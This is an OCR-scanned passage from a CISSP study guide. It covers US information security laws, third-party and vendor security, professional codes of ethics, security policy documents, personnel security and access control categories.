laws that directly or indirectly pertain to issues in information security. This section 
is not an exhaustive review of these laws. Instead only those laws that are represented 
on examination will be included in the discussion. Table 2.2 at the end of this section 
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Table 2.2 Common Information Security Laws and Regulations 


Laws 


Noteworthy Points 


HIPAA - Health Insurance 
Portability and Accountability 
Act 


Computer Fraud and Abuse 
Act - Title 1 8 Section 1 030 


Electronic Communications 
Privacy Act (ECPA) 


The Privacy and Security portions seek to guard Pro- 
tected Health Information (PHI) from unauthorized use 
or disclosure. The Security Rule provides guidance on 
Administrative, Physical, and Technical safeguards for 
the protection of PHI. HIPAA applies to covered entities 
that are typically healthcare providers, health plans, and 
clearinghouses. Also, the HITECH Act of 2009 makes 
HIPAA’s privacy and security provisions apply to busi- 
ness associates of covered entities as well. 

One of the first US laws pertaining to computer crimes. 
Attacks on protected computers, which include govern- 
ment and financial computers as well as those engaged 
in foreign or interstate commerce, which resulted in 
$5,000 in damages during one year, were criminalized. 
The foreign and interstate commerce portion of the 
protected computer definition allowed for many more 
computers than originally intended to be covered by 
this law. 

This law brought the similar level of search and seizure 
protection to non-telephony electronic communica- 
tions that were afforded to telephone communications. 
Effectively, the ECPA protected electronic communica- 
tions from warrantless wiretapping. The PATRIOT Act 
weakened some of the ECPA restrictions. 


PATRIOT Act of 2001 


Gramm-Leach-Bliley Act 
(GLBA) 

California Senate Bill 1 386 
(SB1386) 


Expanded law enforcement’s electronic monitoring capa- 
bilities. Provided broader coverage for wiretaps. Allowed 
for search and seizure without requiring immediate dis- 
closure. Generally lessened the judicial oversight required 
of law enforcement as related to electronic monitoring. 
Requires financial institutions to protect the confidential- 
ity and integrity of consumer financial information. Forced 
them to notify consumers of their privacy practices. 

One of the first US state level breach notification laws. 
Requires organizations experiencing a personal data 
breach involving California residents to notify them of the 
potential disclosure. Served as impetus in the US for later 
state and federal attempts at breach notification laws. 


Sarbanes-Oxley Act of 2002 
(SOX) 


As a direct result of major accounting scandals in the 
United States, the Sarbanes-Oxley Act of 2002, more 
commonly referred to simply as SOX, was passed. SOX 
created regulatory compliance mandates for publicly 
traded companies. The primary goal of SOX was to 
ensure adequate financial disclosure and financial auditor 
independence. SOX requires financial disclosure, auditor 
independence, and internal security controls such as a 
risk assessment. Intentional violation of SOX can result in 
criminal penalties. 


(Continued) 



Legal and Regulatory Issues 


Table 2.2 Common Information Security Laws and Regulations ( cont .) 


Laws 

Noteworthy Points 

Payment Card Industry Data 
Security Standard (PCI-DSS) 

The major vendors in the payment card portion of the 
financial industry have attempted to achieve adequate 
protection of cardholder data through self-regulation. By 
requiring merchants that process credit cards to adhere 
to the Payment Card Industry Data Security Standard 
(PCI-DSS), the major credit card companies seek to 
ensure better protection of cardholder data through 
mandating security policy, security devices, control 
techniques, and monitoring of systems and networks 
comprising cardholder data environments. 


provides a quick summary of laws and regulations that are commonly associated 
with information security. 

US Computer Fraud and Abuse Act 

Title 18 United States Code Section 1030, which is more commonly known as the 
Computer Fraud and Abuse Act, was originally drafted in 1984, but still serves as an 
important piece of legislation related to the prosecution of computer crimes. The law 
has been amended numerous times most notably by the USA PATRIOT Act and the 
more recent Identity Theft Enforcement and Restitution Act of 2008, which is too 
new to be included in the exam at the time of this writing. 


NOTE 

What do bot herders, phreakers, the New York Times attackers, and the authors of Blaster and 
Melissa all have in common? They were all convicted, in part, as a result of Title 18 United States 
Code Section 1030, the frequently amended Computer Fraud and Abuse Act. This law has provided 
for the largest number of computer crime convictions in the United States. Almost all of the 
notorious cyber criminals to receive convictions were prosecuted under this statute. The Computer 
Fraud and Abuse Act was instrumental in the successful prosecution of Albert Gonzales, who 
compromised Heartland Payment Systems and TJX; Adrian Lamo, the “homeless hacker” who 
broke into the New York Times and Microsoft; Kevin Mitnick, perhaps the most widely known of 
all computer related felons; and Jeanson James Ancheta, one of the first persons to be prosecuted for 
his role as a bot herder. 


The goal of the Computer Fraud and Abuse Act was to develop a means of 
deterring and prosecuting acts that damaged federal interest computers. “Federal 
interest computer” includes government, critical infrastructure or financial pro- 
cessing systems; the definition also referenced computers engaging in interstate 
commerce. With the ubiquity of Internet based commerce, this definition can 
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be used to justify almost any Internet-connected computer as being a protected 
computer. The Computer Fraud and Abuse Act criminalized actions involving 
intentional attacks against protected computers that resulted in aggregate damages 
of $5,000 in 1 year. 


NOTE 

The Computer Fraud and Abuse Act criminalized actions that resulted in damages of $5,000 
to protected computers in 1 year. In 2008 the Identity Theft Enforcement and Restitution Act 
was passed which amended the Computer Fraud and Abuse Act. One of the more important 
changes involved removing the requirement that damages should total $5,000. Another important 
amendment made the damage of 10 or more computers a felony. 


USA PATRIOT Act 

The USA PATRIOT Act of 2001 was passed in response to the attacks on the US 
that took place on September 11, 2001. The full title is “Uniting and Strengthening 
America by Providing Appropriate Tools Required to Intercept and Obstruct Terror- 
ism Act,” but it is often simply called the “Patriot Act.” The main thrust of the Patriot 
Act that applies to information security professionals addresses less stringent over- 
sight of law enforcement regarding data collection. Wiretaps have become broader 
in scope. Searches and seizures can be done without immediate notification to the 
person whose data or property might be getting seized. An additional consideration is 
the Patriot Act amended the Computer Fraud and Abuse Act to strengthen the penal- 
ties for those convicted of attempting to damage a protected computer such that up to 
20 years in prison could be served, assuming a second offense. 

HIPAA 

One of the more important regulations is HIPAA , the Health Insurance Portability 
and Accountability Act that was developed in the United States in 1996. HIPAA is a 
large and complex set of provisions that required changes in the health care industry. 
The Administrative Simplification portion. Title II, contains the information most 
important to information security professionals and includes the Privacy and Secu- 
rity Rules. The Administrative Simplification portion applies to what are termed cov- 
ered entities, which includes health plans, healthcare providers, and clearinghouses. 
See the note below for additional information regarding HIPAA’ s applicability. 


NOTE 

Though not testable at the time of this book’s printing, HIPAA has now become more widely applicable 
due to recent legislation. The Health Information Technology for Economic and Clinical Health Act 
(HITECH Act), which was signed into law as part of the American Recovery and Reinvestment Act 
of 2009, extended the privacy and security requirements under HIPAA to those that serve as business 
associates of covered entities. An additional component added by the HITECH Act is a requirement for 
breach notification. General breach notification information will be discussed in the next section. 


Security and 3 rd Parties 


The Privacy and Security portions are largely concerned with the safeguarding 
of Protected Health Information (PHI), which includes almost any individually iden- 
tifiable information that a covered entity would use or store. The HIPAA Security 
Rule includes sections on Administrative, Physical, and Technical safeguards. Each 
safeguard is considered either a required or addressable implementation specifica- 
tion, which speaks of the degree of flexibility a covered entity has in implementation. 


EXAM WARNING 


Breach notification laws are still too recent and mutable to be considered testable material, but 
their importance to the marketplace will make them a subject of test questions in the very near 
future. 


United States Breach Notification Laws 

At present, over 47 US states have enacted breach notification laws (see: http://www. 
ncsl.org/issues-research/telecom/security-breach-notification-laws.aspx). There have 
been attempts at passing a general federal breach notification law in the United States, 
but these efforts have been unsuccessful thus far. Although it would be impossible 
to make blanket statements that would apply to all of the various state laws, there are 
some themes common to quite a few of the state laws that are quickly being adopted 
by organizations concerned with adhering to best practices. 

The purpose of the breach notification laws is typically to notify the affected par- 
ties when their personal data has been compromised. One issue that frequently comes 
up in these laws is what constitutes a notification-worthy breach. Many laws have 
clauses that stipulate that the business only has to notify the affected parties if there 
is evidence to reasonably assume that their personal data will be used maliciously. 

Another issue that is found in some of the state laws is a safe harbor for data that 
was encrypted at the time of compromise. This safe harbor could be a strong impetus 
for organizations to encrypt data that otherwise might not have a regulatory or other 
legal requirement for the data to be encrypted. Breach notification laws are certainly 
here to stay, and a federal law seems as if it is quite likely to come on the horizon in 
the near future. Many organizations in both the US and abroad consider encryption 
of confidential data to be a due diligence issue even if a specific breach notification 
law is not in force within the organization’s particular jurisdiction. 


SECURITY AND 3 rd PARTIES 

Organizations are increasingly reliant upon 3 rd parties to provide significant, and 
sometimes business-critical services. While leveraging external organizations is by 
no means a recent phenomenon, the criticality of the role and also the volume of 
services and products now typically warrant specific attention of an organization’s 
information security department. 
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SERVICE PROVIDER CONTRACTUAL SECURITY 

Contracts are the primary control for ensuring security when dealing with 3 rd party 
organizations’ providing services. The tremendous surge in outsourcing, especially 
the ongoing shift toward cloud services, has made contractual security measures 
much more prominent. While contractual language will vary, there are several com- 
mon contracts or agreements that are used when attempting to ensure security when 
dealing with 3 rd party organizations. 

Service Level Agreements (SLA) 

A common way of ensuring security is through the use of Service Level Agree- 
ments, or SLAs. The SLA identifies key expectations that the vendor is contractually 
required to meet. SLAs are widely used for general performance expectations, but 
are increasingly leveraged for security purposes as well. SLAs primarily address 
availability. 

Attestation 

Larger providers and more discerning customers regularly look to attestation as a 
means of ensuring that some level of scrutiny has been applied to the organization’s 
security posture. Information security attestation involves having a 3 rd party organi- 
zation review the practices of the service provider and make a statement about the 
security posture of the organization. The goal of the service provider is to provide 
evidence that they should be trusted. Typically, a 3 rd party provides attestation 
after performing an audit of the service provider against a known baseline. However, 
another means of attestation that some service providers will offer is in the form of 
penetration test reports from assessments conducted by a 3 rd party. 

Historically, the primary attestation vehicle in security has been via a SAS 70 
review. However, the SAS 70 is not overtly concerned with information security. 
Increasingly ISO 27001 certification is sought by larger service providers for attesta- 
tion purposes. See Chapter 3, Domain 2: Asset Security for additional details on ISO 
27001. 

The Payment Card Industry Digital Security Standard (PCI-DSS) also uses 
attestation: a PCI Qualified Security Assessor (QSA) may assess the security of an 
organization that uses credit cards. If the security meets the PCI-DSS standard, a 
Report of Compliance (ROC) and Attestation of Compliance (AOC) may be issued 
to the organization. 

Right to Penetration Test/Right to Audit 

Though 3 rd party attestation is commonly being offered by vendors as a way to verify 
they are employing sound security practices, some organizations still would prefer to 
derive their own opinion as to the security of the 3 rd party organization. The Right to 
Penetration Test and Right to Audit documents provide the originating organization 
with written approval to perform their own testing or have a trusted provider perform 
the assessment on their behalf. Typically, there will be limitations on what the pen 
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testers or auditors are allowed to use or target, but these should be clearly defined in 
advance. 

An alternative to the Right to Penetration Test/Right to Audit documents is for 
the service provider to present the originating organization with a 3 rd party audit 
or penetration test that the service provider had performed. As stated above, these 
documents can also be thought of as attestation. 


PROCUREMENT 

Procurement is the process of acquiring products or services from a 3 ld party. In 
many, if not most, organizations there is often little insight either sought or provided 
regarding the security of the solution. If involved, traditionally, security consider- 
ations were an afterthought and incorporated rather late in the procurement process. 
Leveraging the security department early and often can serve as a preventive control 
that can allow the organization to make risk-based decisions even prior to vendor or 
solution acceptance. While security will certainly not be the only, or most important, 
consideration, the earlier security is involved the more of a chance there is for mean- 
ingful discussion about the security challenges as well as countermeasures that might 
be required as a result of the procurement. 


VENDOR GOVERNANCE 

Given the various ways organizations leverage 3 rd party organizations and vendors, 
there is a need for employing vendor governance, also called vendor management. 
The goal of vendor governance is to ensure that the business is continually getting 
sufficient quality from its 3 rd party providers. Professionals performing this function 
will often be employed at both the originating organization as well as the 3 rd party. 
Interestingly, the vendor governance or management can itself be outsourced to 
an additional 3 ld party. Ultimately, the goal is to ensure that strategic partnerships 
between organizations continually provide the expected value. 


ACQUISITIONS 

Acquisitions can be disruptive to business, impacting aspects of both organiza- 
tions. That goes doubly so for information security. Imagine that Tyrell Corpora- 
tion has acquired Tannhauser, Inc. Tyrell Corporation has made a significant invest- 
ment in information security, while Tannhauser has not. In fact, there are multiple 
live intrusions on the Tannhauser, including a live worm infestation. What if Tyrell 
simply links the two corporate WANs together, with little or no filtering between 
the two? 

Due diligence requires a thorough risk assessment of any acquired company’s 
information security program, including an effective assessment of the current state 
of network security. This includes performing vulnerability assessment and penetra- 
tion testing of the acquired company before any merger of networks. See Chapter 7, 
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Domain 6: Security Assessment and Testing for more information on the types of 
tests that should be performed. 

DIVESTITURES 

Divestitures (also known as de-mergers and de-acquisitions) represent the flip side 
of Acquisitions: one company becomes two or more. Divestitures can represent 
more risk than acquisitions: how exactly will sensitive data be split up? How will IT 
systems be split? 

It is quite common for formerly unified companies to split off, and inadvertently 
maintain duplicate accounts and passwords within the two newly spun-off compa- 
nies. This allows (former) insider attacks: where an employee of the formerly unified 
company hacks into a divested company by re-using old credentials. Similar risks 
exist with the reuse of physical security controls, including keys and badges. All 
forms of access for former employees must be revoked. 


ETHICS 

Ethics is doing what is morally right. The Hippocratic Oath, taken by doctors, is an 
example of a code of ethics. 

Ethics are of paramount concern for information security professionals: we are 
often trusted with highly sensitive information, and our employers, clients, and 
customers must know that we will treat their information ethically. 

Digital information also raises ethical issues. Imagine that your DNA were 
sequenced and stored in a database. That database could tell you whether you were 
predisposed to suffer certain genetic illnesses, such as Huntington’s disease. Then 
imagine insurance companies using that database to deny coverage today because 
you are likely to have disease in the future. 

THE (ISC) 2 ® CODE OF ETHICS 

The (ISC) 2 ® code of ethics is the most testable code of ethics on the exam. That’s fair: 
you cannot become a CISSP® without agreeing to the code of ethics (among other steps); 
so it is reasonable to expect new CISSPs® to understand what they are agreeing to. 


NOTE 

Download the (ISC) 2 ® code of ethics at http://www.isc2.org/ethics/default.aspx and 
study it carefully. You must understand the entire code, not just the details covered in this 
book. 


The (ISC) 2 ® code of ethics include the preamble, canons, and guidance. The 
preamble is the introduction to the code. The canons are mandatory: you must follow 
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them to become (and remain) a CISSP®. The guidance is “advisory” (not manda- 
tory): it provides supporting information for the canons. 

The code of ethics preamble and canons are quoted here: “Safety of the common- 
wealth, duty to our principals, and to each other requires that we adhere, and be seen 
to adhere, to the highest ethical standards of behavior. Therefore, strict adherence to 
this Code is a condition of certification.” 

The canons are the following: 

• Protect society, the commonwealth, and the infrastructure. 

• Act honorably, honestly, justly, responsibly, and legally. 

• Provide diligent and competent service to principals. 

• Advance and protect the profession. [6] 

The canons are applied in order, and when faced with an ethical dilemma, you 
must follow the canons in order. In other words, it is more important to protect 
society than to advance and protect the profession. 

This order makes sense. The South African system of Apartheid (racial segrega- 
tion) was legal, but unethical, for example. The canons address these issues in an 
unambiguous fashion. 

The (ISCf® Code of Ethics Canons in Detail 

The first, and therefore most important, canon of the (ISC) 2 ® Code of Ethics requires 
the information security professional to “ protect society, the commonwealth, and the 
infrastructure .”[7] The focus of the first canon is on the public and their understand- 
ing and faith in information systems. Security professionals are charged with the 
promoting of safe security practices and bettering the security of systems and infra- 
structure for the public good. 

The second canon in the (ISC) 2 ® Code of Ethics charges information security 
professionals to “ act honorably, honestly, justly, responsibly, and legally. ”[ 8] This 
canon is fairly straightforward, but there are a few points worth emphasizing here. 
One point that is detailed within this canon is related to laws from different jurisdic- 
tions being found to be in conflict. The (ISC) 2 ® Code of Ethics suggest that priority 
be given to the jurisdiction in which services are being provided. Another point made 
by this canon is related to providing prudent advice, and cautioning the security pro- 
fessional from unnecessarily promoting fear, uncertainty, and doubt. 

The (ISC) 2 ® Code of Ethics’ third canon requires that security professionals 
“ provide diligent and competent service to principals .”[9] The primary focus of 
this canon is ensuring that the security professional provides competent service for 
which she is qualified and which maintains the value and confidentiality of informa- 
tion and the associated systems. An additional important consideration is to ensure 
that the professional does not have a conflict of interest in providing quality services. 

The fourth and final canon in the (ISC) 2 ® Code of Ethics mandates that infor- 
mation security professionals “ advance and protect the professional 10] This canon 
requires that the security professionals maintain their skills, and advance the skills 
and knowledge of others. An additional consideration that warrants mention is that 
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this canon requires that individuals ensure not to negatively impact the security 
profession by associating in a professional fashion with those who might harm the 
profession. 


EXAM WARNING 


The (ISC) 2 ® code of ethics is highly testable, including applying the canons in order. You may be 
asked for the “best” ethical answer, when all answers are ethical, per the canons. In that case, choose 
the answer that is mentioned first in the canons. Also, the most ethical answer is usually the best: 
hold yourself to a very high ethical level on questions posed during the exam. 


COMPUTER ETHICS INSTITUTE 

The Computer Ethics Institute provides their “ Ten Commandments of Computer 
Ethics ” as a code of computer ethics. The code is both short and fairly straight- 
forward. Both the name and format are reminiscent of the Ten Commandments of 
Judaism, Christianity, and Islam, but there is nothing overtly religious in nature 
about the Computer Ethics Institute’s Ten Commandments. The Computer Ethics 
Institute’s Ten Commandments of Computer Ethics are: 

1 . Thou shalt not use a computer to harm other people. 

2. Thou shalt not interfere with other people’s computer work. 

3. Thou shalt not snoop around in other people’s computer files. 

4. Thou shalt not use a computer to steal. 

5. Thou shalt not use a computer to bear false witness. 

6 . Thou shalt not copy or use proprietary software for which you have not paid. 

7. Thou shalt not use other people’s computer resources without authorization or 
proper compensation. 

8 . Thou shalt not appropriate other people’s intellectual output. 

9. Thou shalt think about the social consequences of the program you are writing 
or the system you are designing. 

1 0. Thou shalt always use a computer in ways that ensure consideration and 
respect for your fellow humans. [1 1] 

lAB’S ETHICS AND THE INTERNET 

Much like the fundamental protocols of the Internet, the Internet Activities Board’s 
(IAB) code of ethics, Ethics and the Internet, is defined in an RFC document. RFC 
1087, Ethics and the Internet, was published in 1987 to present a policy relating to 
ethical behavior associated with the Internet. The RFC is short and easy to read, and 
provides five basic ethical principles. According to the IAB, the following practices 
would be considered unethical behavior if someone purposely: 

• Seeks to gain unauthorized access to the resources of the Internet; 

• Disrupts the intended use of the Internet; 
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• Wastes resources (people, capacity, computer) through such actions; 

• Destroys the integrity of computer-based information; 

• Compromises the privacy of users. [12] 


INFORMATION SECURITY GOVERNANCE 

Information Security Governance is information security at the organizational level: 
senior management, policies, processes, and staffing. It is also the organizational 
priority provided by senior leadership, which is required for a successful information 
security program. 


SECURITY POLICY AND RELATED DOCUMENTS 

Documents such as policies and procedures are a required part of any successful 
information security program. These documents should be grounded in reality: they are 
not idealistic documents that sit on shelves collecting dust. They should mirror the real 
world, and provide guidance on the correct (and sometimes required) way of doing things. 


EXAM WARNING 


When discussing policies and related documents, terms like “mandatory” (compulsory) and 
“discretionary” may be a bit of an overstatement, but it is a useful one for the exam. This text will 
use those terms. We live in an information security world that is painted in shades of gray, but the 
exam asks black-and-white questions about the best choice. A guideline to follow best practices is 
“discretionary,” but if you decide not to follow a guideline, the decision should be well thought out 
and documented. 


Policy 

Policies are high-level management directives. Policy is mandatory: if you do not 
agree with your company’s sexual harassment policy, for example, you do not have 
the option of not following it. 

Policy is high level: it does not delve into specifics. A server security policy 
would discuss protecting the confidentiality, integrity, and availability of the system 
(usually in those terms). It may discuss software updates and patching. The policy 
would not use terms like “Linux” or “Windows”; that is too low level. In fact, if 
you converted your servers from Windows to Linux, your server policy would not 
change. Other documents, like procedures, would change. 

Components of Program Policy 

All policy should contain these basic components: 

• Purpose 

• Scope 
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• Responsibilities 

• Compliance 

Purpose describes the need for the policy, typically to protect the confidentiality, 
integrity, and availability of protected data. 

Scope describes what systems, people, facilities, and organizations are covered 
by the policy. Any related entities that are not in scope should be documented, to 
avoid confusion. 

Responsibilities include responsibilities of information security staff, policy and 
management teams, as well as responsibilities of all members of the organization. 

Compliance describes two related issues: how to judge the effectiveness of the 
policies (how well they are working), and what happens when policy is violated 
(the sanction). All policy must have “teeth”: a policy that forbids accessing explicit 
content via the Internet is not useful if there are no consequences for doing so. 

Policy Types 

NIST Special Publication 800-12 (see http://csrc.nist.gov/publications/nist- 
pubs/800-12/handbook.pdf) discusses three specific policy types: program policy, 
issue-specific policy, and system-specific policy. 

Program policy establishes an organization’s information security program. 
Examples of issue-specific policies listed in NIST SP 800-12 include email policy 
and email privacy policy. Examples of system-specific policies include a file server 
policy, or a Web server policy. 

Procedures 

A procedure is a step-by-step guide for accomplishing a task. They are low level and 
specific. Like policies, procedures are mandatory. 

Here is a simple example procedure for creating a new user: 

1 . Receive a new-user request form and verify its completeness. 

2. Verify that the user’s manager has signed the form. 

3. Verify that the user has read and agreed to the user account security policy. 

4. Classify the user’s role by following role-assignment procedure NX- 103. 

5. Verify that the user has selected a “secret word,” such as their mother’s maiden 
name, and enter it into the help desk account profile. 

6 . Create the account and assign the proper role. 

7. Assign the secret word as the initial password, and set “Force user to change 
password on next login to ‘True.’ ” 

8 . Email the New Account document to the user and their manager. 

The steps of this procedure are mandatory. Security administrators do not have 
the option of skipping step 1, for example, and create an account without a form. 

Other safeguards depend on this fact: when a user calls the help desk as a result 
of a forgotten password, the help desk will follow their “forgotten password” proce- 
dure, which includes asking for the user’s secret word. They cannot do that unless 
step 5 was completed: without that word, the help desk cannot securely reset the 
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password. This mitigates social engineering attacks, where an imposter tries to trick 
the help desk to resetting a password for an account they are not authorized to access. 

Standards 

A standard describes the specific use of technology, often applied to hardware and 
software. “All employees will receive an ACME Nexus-6 laptop with 2 gigabytes 
of memory, a 2.8 GHZ dual core CPU, and 300-gigabyte disk” is an example of a 
hardware standard. “The laptops will run Windows 7 Professional, 32-bit version” is 
an example of a software (operating system) standard. 

Standards are mandatory. They lower the Total Cost of Ownership of a safeguard. 
Standards also support disaster recovery. Imagine two companies in buildings side by 
side an office park. Both have 1000 laptops in each building. 

One company uses standard laptop hardware and software. The laptop operating 
system is installed from a central preconfigured and patched image. The standard 
operating system has preconfigured network file storage, all required tools, and 
software preinstalled, and preconfigured antivirus and firewall software. Users are 
forbidden from installing their own applications. 

The other company does not employ standards. The laptop hardware is made by a 
variety of vendors. Multiple operating systems are used, at various patch levels. Some 
use network storage; others do not. Many have applications installed by end-users. 

Which company will recover more quickly if the buildings burn down? The first 
company needs to buy 1000 identical laptops, recover the OS image and imaging 
software from offsite storage, configure an imaging server, and rebuild the laptops. 
Not easy, but doable. The second company’s recovery will be far more difficult, and 
more likely to fail. 

Guidelines 

Guidelines are recommendations (which are discretionary). A guideline can be a use- 
ful piece of advice, such as “To create a strong password, take the first letter of every 
word in a sentence, and mix in some numbers and symbols. ‘I will pass the CISSP® 
exam in 6 months!’ becomes Twptcei6m!’ ” 

You can create a strong password without following this advice, which is why 
guidelines are not mandatory. They are useful, especially for novice users. 

Baselines 

Baselines are uniform ways of implementing a standard. “Harden the system by 
applying the Center for Internet Security Linux benchmarks” is an example of a 
baseline (see http://benchmarks.cisecurity.org/en-us/?route=default for the Security 
Benchmarks division of the Center for Internet Security; they are a great resource). 
The system must meet the baseline described by those benchmarks. 

Baselines are discretionary: it is acceptable to harden the system without follow- 
ing the aforementioned benchmarks, as long as it is at least as secure as a system 
hardened using the benchmarks. Formal exceptions to baselines will require senior 
management sign-off. 
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Table 2.3 Summary of Security Documentation 


Document 

Example 

Mandatory or 

Discretionary? 

Policy 

Protect the CIA of Pit by hardening 

the operating system 

Mandatory 

Procedure 

Step 1: Install pre-hardened OS 

Image. Step 2: Download patches 

from update server. Step 3: ... 

Mandatory 

Standard 

Use Nexus-6 laptop hardware 

Mandatory 

Guideline 

Patch installation may be automated 

via the use of an installer script 

Discretionary 

Baselines 

Use the CIS Security Benchmarks 

Windows Benchmark 

Discretionary 


Table 2.3 summarizes the types of security documentation. 

PERSONNEL SECURITY 

Users can pose the biggest security risk to an organization. Background checks should 
be performed, contractors need to be securely managed, and users must be properly 
trained and made aware of security risks, as we will discuss next. Controls such 
as Non-Disclosure Agreements (NDA) and related employment agreements are a 
recommended personnel security control, as we will discuss in Chapter 8, Domain 7: 
Security Operations. 

Security Awareness and Training 

Security awareness and training are often confused. Awareness changes user 
behavior; training provides a skill set. 

Reminding users to never share accounts or write their passwords down is an 
example of awareness. It is assumed that some users are doing the wrong thing, and 
awareness is designed to change that behavior. 

Security training teaches a user how to do something. Examples include training new 
help desk personnel to open, modify, and close service tickets; training network engineers 
to configure a router, or training a security administrator to create a new account. 

Background Checks 

Organizations should conduct a thorough background check before hiring an indi- 
vidual. A criminal records check should be conducted, and all experience, education 
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and certifications should be verified. Lying or exaggerating about education, certifi- 
cations, and related credentials is one of the most common examples of dishonesty 
in regards to the hiring process. 

More thorough background checks should be conducted for roles with height- 
ened privileges, such as access to money or classified information. These checks can 
include a financial investigation, a more through criminal records check, and inter- 
views with friends, neighbors, and current and former coworkers. 


Employee Termination 

Termination should result in immediate revocation of all employee access. Beyond 
account revocation, termination should be a fair process. There are ethical and legal 
reasons for employing fair termination, but there is also an additional information 
security advantage. An organization’s worst enemy can be a disgruntled former 
employee, who, even without legitimate account access, knows where the “weak 
spots are.” This is especially true for IT personnel. 

A negative reaction to termination is always possible, but using a fair termination 
process may lower the risk. As in many areas on the CISSP® exam, process trumps 
informal actions. A progressive discipline (also called ladder of discipline) process 
includes: 

• Coaching 

• Formal discussion 

• Verbal warning meeting, with Human Resources attendance (perhaps multiple 
warnings) 

• Written warning meeting, with Human Resources attendance (perhaps multiple 
warnings) 

• Termination 

The employee should be given clear guidance on the cause of the discipline, 
and also given direct actionable steps required to end the process. An example 
is “You are being disciplined for failing to arrive at work in a timely fashion. 
You must arrive for work by 9:00 AM each workday, unless otherwise arranged 
or in cases of an emergency. This process will end when you consistently arrive 
for work on time. This process will continue if you continue to fail to arrive at 
work on time. This process can lead to termination of employment if the problem 
continues.” 

If the process ends in termination, there are no surprises left. This is fair, and also 
lowers the chance of a negative reaction. People tend to act more reasonably if they 
feel they have been treated fairly. 

Vendor, Consultant and Contractor Security 

Vendors, Consultants and Contractors can introduce risks to an organization. They 
are not direct employees, and sometimes have access to systems at multiple organi- 
zations. If allowed to, they may place an organization’s sensitive data on devices not 
controlled (or secured) by the organization. 
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Third-party personnel with access to sensitive data must be trained and made 
aware of risks, just as employees are. Background checks may also be required, 
depending on the level of access required. Information security policies, procedures 
and other guidance should apply as well. Additional policies regarding ownership of 
data and intellectual property should be developed. Clear rules dictating where and 
when a 3 rd party may access or store data must be developed. 

Other issues to consider include: how does a vendor with access to multiple 
organizations’ systems manage access control? Many vendors will re-use the same 
credentials across multiple sites, manually synchronizing passwords (if they are able 
or allowed to). As we will discuss in Chapter 6, Domain 5: Identity and Access 
Management, multi-factor authentication mitigates the risk of stolen, guessed or 
cracked credentials being reused elsewhere. 

Also, from a technical perspective, how are the vendor’s systems secured and 
interconnected? Can a breach at vendor’s site (or any of the vendor’s clients) result 
in a breach at the client organization? Who is responsible for patching and securing 
vendor systems that exist onsite at the client? 

Outsourcing and Offshoring 

Outsourcing is the use of a third party to provide Information Technology support 
services that were previously performed in-house. Offshoring is outsourcing to 
another country. 

Both can lower Total Cost of Ownership by providing IT services at lower cost. 
They may also enhance the information technology resources and skill set and 
resources available to a company (especially a small company), which can improve 
confidentiality, integrity, and availability of data. 

Offshoring can raise privacy and regulatory issues. For example, for a U.S. com- 
pany that offshores data to Australia, there is no Health Insurance Portability and 
Accountability Act (HIPAA, the primary regulation covering health care data in the 
United States) in Australia. There is no SOX (Sarbanes-Oxley, protecting publicly 
traded data in the United States), Gramm-Leach-Bliley Act (GLBA, which protects 
financial information in the United States), etc. 

A thorough and accurate Risk Analysis must be performed before outsourcing or 
offshoring sensitive data. If the data will reside in another country, you must ensure 
that laws and regulations governing the data are followed, even beyond the laws of 
the offshored jurisdiction. This can be done contractually: the Australian company 
can agree to follow HIPAA via contract, for example. 


LEARN BY EXAMPLE 

Do You Know Where Your Data Is? 

University of California at San Francisco (UCSF) Medical Center outsourced transcription work 
to a Florida company. A transcriptionist working for the Florida company in 2003 subcontracted 
some of the work to a man in Texas, who then subcontracted it again to Ms. Beloch, a woman 
working in Pakistan. 
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Unbeknownst to UCSF, some of their transcription work had been offshored. USCF’s 
ePHI — Electronically Protected Healthcare Information (federally regulated medical 
information) was in Pakistan, where HIPAA does not apply. 

Ms. Beloch was not paid in a timely fashion, and emailed USCF, threatening if she was 
not paid, “I will expose all the voice files and patient records of UCSF ... on the Intemet.”[13] 
She attached USCF ePHI to the email to prove her access. She was paid, and the data was not 
released. 

You must always know where your data is. Any outsourcing agreement must contain 
rules on subcontractor access to sensitive data. Any offshoring agreement must contractually 
account for relevant laws and regulations such as HIPAA. 


ACCESS CONTROL DEFENSIVE CATEGORIES AND TYPES 

In order to understand and appropriately implement access controls, understanding 
what benefits each control can add to security is vital. In this section, each type of 
access control will be defined on the basis of how it adds to the security of the system. 
There are six access control types: 

• Preventive 

• Detective 

• Corrective 

• Recovery 

• Deterrent 

• Compensating 

These access control types can fall into one of three categories: administrative, 
technical, or physical. 

1 . Administrative (also called directive) controls are implemented by creating and 
following organizational policy, procedure, or regulation. User training and 
awareness also fall into this category. 

2 . Technical controls are implemented using software, hardware, or firmware that 
restricts logical access on an information technology system. Examples include 
firewalls, routers, encryption, etc. 

3 . Physical controls are implemented with physical devices, such as locks, fences, 
gates, security guards, etc. 

PREVENTIVE 

Preventive controls prevent actions from occurring. It applies restrictions to what a 
potential user, either authorized or unauthorized, can do. The assigning of privileges 
on a system is a good example of a preventive control because having limited privi- 
leges prevents the user from accessing and performing unauthorized actions on the 
system. An example of an administrative preventive control is a pre-employment 
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drug screening. It is designed to prevent an organization from hiring an employee 
who is using illegal drugs. 


NOTE 

Some sources use the term “preventive,” others use “preventative” (extra “ta”). As far as the exam is 
concerned, they are synonyms. 


DETECTIVE 

Detective controls are controls that alert during or after a successful attack. Intrusion 
detection systems alerting after a successful attack, closed-circuit television cameras 
(CCTV) that alert guards to an intruder, and a building alarm system that is triggered 
by an intruder are all examples of detective controls. 


CORRECTIVE 

Corrective controls work by “correcting” a damaged system or process. The correc- 
tive access control typically works hand in hand with detective access controls. Anti- 
virus software has both components. First, the antivirus software runs a scan and uses 
its definition hie to detect whether there is any software that matches its virus list. If 
it detects a virus, the corrective controls take over, places the suspicious software in 
quarantine, or deletes it from the system. 


RECOVERY 

After a security incident has occurred, recovery controls may need to be taken in 
order to restore functionality of the system and organization. Recovery means that 
the system must be recovered: reinstalled from OS media or image, data restored 
from backups, etc. 

The connection between corrective and recovery controls is important to under- 
stand. For example, let us say a user downloads a Trojan horse. A corrective control 
may be the antivirus software “quarantine.” If the quarantine does not correct the 
problem, then a recovery control may be implemented to reload software and rebuild 
the compromised system. 

DETERRENT 

Deterrent controls deter users from performing actions on a system. Examples 
include a “beware of dog” sign: a thief facing two buildings, one with guard dogs 
and one without, is more likely to attack the building without guard dogs. A large 
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fine for speeding is a deterrent for drivers to not speed. A sanction policy that makes 
users understand that they will be fired if they are caught surfing illicit or illegal Web 
sites is a deterrent. 

COMPENSATING 

A compensating control is an additional security control put in place to compensate 
for weaknesses in other controls. For example, surfing explicit Web sites would be a 
cause for an employee to lose his/her job. This would be an administrative deterrent 
